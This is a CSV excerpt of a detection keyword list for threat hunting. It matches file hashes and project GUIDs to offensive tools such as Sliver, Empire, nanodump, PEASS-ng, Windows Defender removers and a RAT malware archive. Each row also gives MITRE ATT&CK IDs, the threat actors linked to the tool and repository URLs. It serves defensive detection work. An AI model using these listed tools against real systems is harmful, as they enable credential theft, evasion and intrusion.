"*d7dc358e43314be5c096f1f011947f422a12a261db64528bb531418eab164638*",".{0,1000}d7dc358e43314be5c096f1f011947f422a12a261db64528bb531418eab164638.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","39909"
"*d7e3d2ef31bf5905d593420dbd3aa92e709d2524fa63ffa0bb3b75dc2ddc408f*",".{0,1000}d7e3d2ef31bf5905d593420dbd3aa92e709d2524fa63ffa0bb3b75dc2ddc408f.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","39910"
"*d7f0690e41786270f345ff4851fd4b239631d4c1e7a6b9f74ad139565cbdb2ed*",".{0,1000}d7f0690e41786270f345ff4851fd4b239631d4c1e7a6b9f74ad139565cbdb2ed.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39914"
"*d80344fd9c189a4333409958250a0e3ec44a0168e70f5b6b8c78588c8ed3caf4*",".{0,1000}d80344fd9c189a4333409958250a0e3ec44a0168e70f5b6b8c78588c8ed3caf4.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","39917"
"*d8043ec0bd5263618118ce4f327126c9413fa5f041426117adc0d15e4a168144*",".{0,1000}d8043ec0bd5263618118ce4f327126c9413fa5f041426117adc0d15e4a168144.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","39918"
"*d80804bbcdbdd1933da9d9b7c0457ae73b85026e71970d1ab80af063b8fbac2e*",".{0,1000}d80804bbcdbdd1933da9d9b7c0457ae73b85026e71970d1ab80af063b8fbac2e.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","#filehash","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","39919"
"*D8091ED0-5E78-4AF5-93EE-A5AA6E978430*",".{0,1000}D8091ED0\-5E78\-4AF5\-93EE\-A5AA6E978430.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","0","#GUIDproject","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","39920"
"*d80e2a137e1d2639c8e689549e5e17423f7ff19aa0bbfcab8e75b43c6c4b2d60*",".{0,1000}d80e2a137e1d2639c8e689549e5e17423f7ff19aa0bbfcab8e75b43c6c4b2d60.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","39921"
"*d815672bd8c68dd861dac2266be662d32c22c7d07f13214ea84fd0cbd775ab92*",".{0,1000}d815672bd8c68dd861dac2266be662d32c22c7d07f13214ea84fd0cbd775ab92.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","39923"
"*d81858b01de71a850d5c4f69578441c6d91f06dbd96b96c3d78cb6539681816b*",".{0,1000}d81858b01de71a850d5c4f69578441c6d91f06dbd96b96c3d78cb6539681816b.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","39924"
"*d81d498e8a18f7075fa20adaaa81a754f33513ba4b6ffac9874aff874641c532*",".{0,1000}d81d498e8a18f7075fa20adaaa81a754f33513ba4b6ffac9874aff874641c532.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#filehash","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","39925"
"*d829c805dfc29e54769382a8d2378a133cd21627b97a60e2d835ff8d6bbd203c*",".{0,1000}d829c805dfc29e54769382a8d2378a133cd21627b97a60e2d835ff8d6bbd203c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39927"
"*d8309dbfb648a5f80ac88634ffaa3a9d613cd31a785b9902a687edbc2d71d73b*",".{0,1000}d8309dbfb648a5f80ac88634ffaa3a9d613cd31a785b9902a687edbc2d71d73b.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","39928"
"*d83164f00776f7b9b32b840d6c7637d3af55fd19eaa351075e98e1cdfc43bf25*",".{0,1000}d83164f00776f7b9b32b840d6c7637d3af55fd19eaa351075e98e1cdfc43bf25.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39929"
"*d836bdb64f2112e1fff1080145cd2f349478ba67e1d68bdfd9e734b114f7627d*",".{0,1000}d836bdb64f2112e1fff1080145cd2f349478ba67e1d68bdfd9e734b114f7627d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","39930"
"*d83b72b8147d812d79c480142f74fa123115349052ab1d88df742c0cc8c1aca5*",".{0,1000}d83b72b8147d812d79c480142f74fa123115349052ab1d88df742c0cc8c1aca5.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","39932"
"*d83e80b7ad4adae59ae0257237f4efcbefa94117edfc36955311c14115a2461b*",".{0,1000}d83e80b7ad4adae59ae0257237f4efcbefa94117edfc36955311c14115a2461b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39933"
"*d84d9d935f9f3392934ff2613e47032d3120f7c0ac4278a1e88bec65c5316a53*",".{0,1000}d84d9d935f9f3392934ff2613e47032d3120f7c0ac4278a1e88bec65c5316a53.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","39937"
"*d8512753450da47e16944a61c468294e7a2617f244bbe6595fedf0249af0bba3*",".{0,1000}d8512753450da47e16944a61c468294e7a2617f244bbe6595fedf0249af0bba3.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","0","#filehash","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","39939"
"*d854d2be5826183cb7c1317e3d920871fd467d5506b70e3c5147599ca2704ee6*",".{0,1000}d854d2be5826183cb7c1317e3d920871fd467d5506b70e3c5147599ca2704ee6.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","39940"
"*d857b8d24455c5c63414bdb7a7e6ccdc3a198421400f2b659591902e3babc93f*",".{0,1000}d857b8d24455c5c63414bdb7a7e6ccdc3a198421400f2b659591902e3babc93f.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","39941"
"*d8580cfe02f5f7682e56daf8776a4394c199fa8018c51b8eed3f2c3a60c5edec*",".{0,1000}d8580cfe02f5f7682e56daf8776a4394c199fa8018c51b8eed3f2c3a60c5edec.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","39942"
"*d8582bc308f3f5364747243e689c59401ba0d5a61696bdbbe04b699eb837724f*",".{0,1000}d8582bc308f3f5364747243e689c59401ba0d5a61696bdbbe04b699eb837724f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39943"
"*d8582bc308f3f5364747243e689c59401ba0d5a61696bdbbe04b699eb837724f*",".{0,1000}d8582bc308f3f5364747243e689c59401ba0d5a61696bdbbe04b699eb837724f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39944"
"*d8582bc308f3f5364747243e689c59401ba0d5a61696bdbbe04b699eb837724f*",".{0,1000}d8582bc308f3f5364747243e689c59401ba0d5a61696bdbbe04b699eb837724f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39945"
"*d8582bc308f3f5364747243e689c59401ba0d5a61696bdbbe04b699eb837724f*",".{0,1000}d8582bc308f3f5364747243e689c59401ba0d5a61696bdbbe04b699eb837724f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","39946"
"*d85882904decb15b9b4cf1000a05dfe8694a8d4c74a606a6df2b0cb06937f038*",".{0,1000}d85882904decb15b9b4cf1000a05dfe8694a8d4c74a606a6df2b0cb06937f038.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39947"
"*d8588b3dfe75180aa8cff97c6d3cc9dc89da64a3acbb826742939869bca92b69*",".{0,1000}d8588b3dfe75180aa8cff97c6d3cc9dc89da64a3acbb826742939869bca92b69.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39948"
"*d859332c8e766329669e274b93ecd7ab6f1acfb00a285e32c2545bb0234c0e18*",".{0,1000}d859332c8e766329669e274b93ecd7ab6f1acfb00a285e32c2545bb0234c0e18.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","39949"
"*d85ebff4e801e52ef86698933ccc7d66adc5e1aae2b0a8433be591fa31046436*",".{0,1000}d85ebff4e801e52ef86698933ccc7d66adc5e1aae2b0a8433be591fa31046436.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","39950"
"*d860326bffbb645fcd78d65712b1950af17e47fdeab96e6dfa0a061a0723e570*",".{0,1000}d860326bffbb645fcd78d65712b1950af17e47fdeab96e6dfa0a061a0723e570.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","39951"
"*d861f9c6114dd6d6e8227ec4fbb0f76318a36a384842eb76b5c3131a35b5c513*",".{0,1000}d861f9c6114dd6d6e8227ec4fbb0f76318a36a384842eb76b5c3131a35b5c513.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","39952"
"*d86bebcde6d5835cd2237d4e37df9858102002a4b9211aa3827e4bec0eca9897*",".{0,1000}d86bebcde6d5835cd2237d4e37df9858102002a4b9211aa3827e4bec0eca9897.{0,1000}","offensive_tool_keyword","m365-fatigue","automates the authentication process for Microsoft 365 by using the device code flow and Selenium for automated login. It keeps bombing the user with MFA requests and stores the access_token once the MFA was approved.","T1110.001 - T1078.001 - T1556.004","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/0xB455/m365-fatigue","1","0","#filehash","N/A","10","1","77","7","2024-04-08T14:53:44Z","2023-11-30T13:33:03Z","39953"
"*d876e3d39079bc0dbe6c171c3354b894f1c1f439ea80e335c401f19792efe064*",".{0,1000}d876e3d39079bc0dbe6c171c3354b894f1c1f439ea80e335c401f19792efe064.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","39956"
"*d8794a5b30966e2a66827976cbba7a251746c832d27236fc832bd4d309b1ddb6*",".{0,1000}d8794a5b30966e2a66827976cbba7a251746c832d27236fc832bd4d309b1ddb6.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","39957"
"*d87a4da0ba80cee6c60be1a1ebc2c138a79682ca7ad2ef8b91c2035e9a7ecd40*",".{0,1000}d87a4da0ba80cee6c60be1a1ebc2c138a79682ca7ad2ef8b91c2035e9a7ecd40.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","39958"
"*d87c78f071b72de76e3569729f5dce81b6379a9ef115a5e4305e1e089531938e*",".{0,1000}d87c78f071b72de76e3569729f5dce81b6379a9ef115a5e4305e1e089531938e.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","39959"
"*d886eb849d99a52449eb869bdf954644c2d5259db29be9cc757084bf166c42e0*",".{0,1000}d886eb849d99a52449eb869bdf954644c2d5259db29be9cc757084bf166c42e0.{0,1000}","offensive_tool_keyword","AdaptixC2","C2- Adaptix is an extensible post-exploitation and adversarial emulation framework made for penetration testers","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/Adaptix-Framework/AdaptixC2","1","0","#filehash","N/A","10","10","547","114","2025-04-21T06:03:46Z","2024-08-21T18:07:05Z","39961"
"*d8891b478ae421a3c0abc85bfa2b4bab4c4d35d46a26ba9f7fc1c6b3d0d30009*",".{0,1000}d8891b478ae421a3c0abc85bfa2b4bab4c4d35d46a26ba9f7fc1c6b3d0d30009.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39962"
"*d88c69e0ca8a72f71d225ece1756c338ab37ec8af40bd0cdae4d9a73ad20457e*",".{0,1000}d88c69e0ca8a72f71d225ece1756c338ab37ec8af40bd0cdae4d9a73ad20457e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","39963"
"*d8982f57fd89ad996df4e3abe1610118575d8ae93f06cc2564c230d1c5f99d36*",".{0,1000}d8982f57fd89ad996df4e3abe1610118575d8ae93f06cc2564c230d1c5f99d36.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","39965"
"*d89d673d364fe861ce88027d3cd7598d64b2bd68f5b3b1e85bcca27b091de5b6*",".{0,1000}d89d673d364fe861ce88027d3cd7598d64b2bd68f5b3b1e85bcca27b091de5b6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","39966"
"*d8a298d200fa2b2641c5b610b5aba16940c0d0c8c47eada2531a77b751213b1d*",".{0,1000}d8a298d200fa2b2641c5b610b5aba16940c0d0c8c47eada2531a77b751213b1d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39967"
"*D8A76296-A666-46C7-9CA0-254BA97E3B7C*",".{0,1000}D8A76296\-A666\-46C7\-9CA0\-254BA97E3B7C.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","#GUIDproject","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","39968"
"*D8B2F4F4-2B59-4457-B710-F15844570997*",".{0,1000}D8B2F4F4\-2B59\-4457\-B710\-F15844570997.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#GUIDproject","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","39970"
"*D8BDABF6-6A96-4B48-8C1C-B6E78CBBF50E*",".{0,1000}D8BDABF6\-6A96\-4B48\-8C1C\-B6E78CBBF50E.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","39971"
"*d8c71995027b18f8664c982594ffcaf24beea40b58877aad962c239f2849863d*",".{0,1000}d8c71995027b18f8664c982594ffcaf24beea40b58877aad962c239f2849863d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","39972"
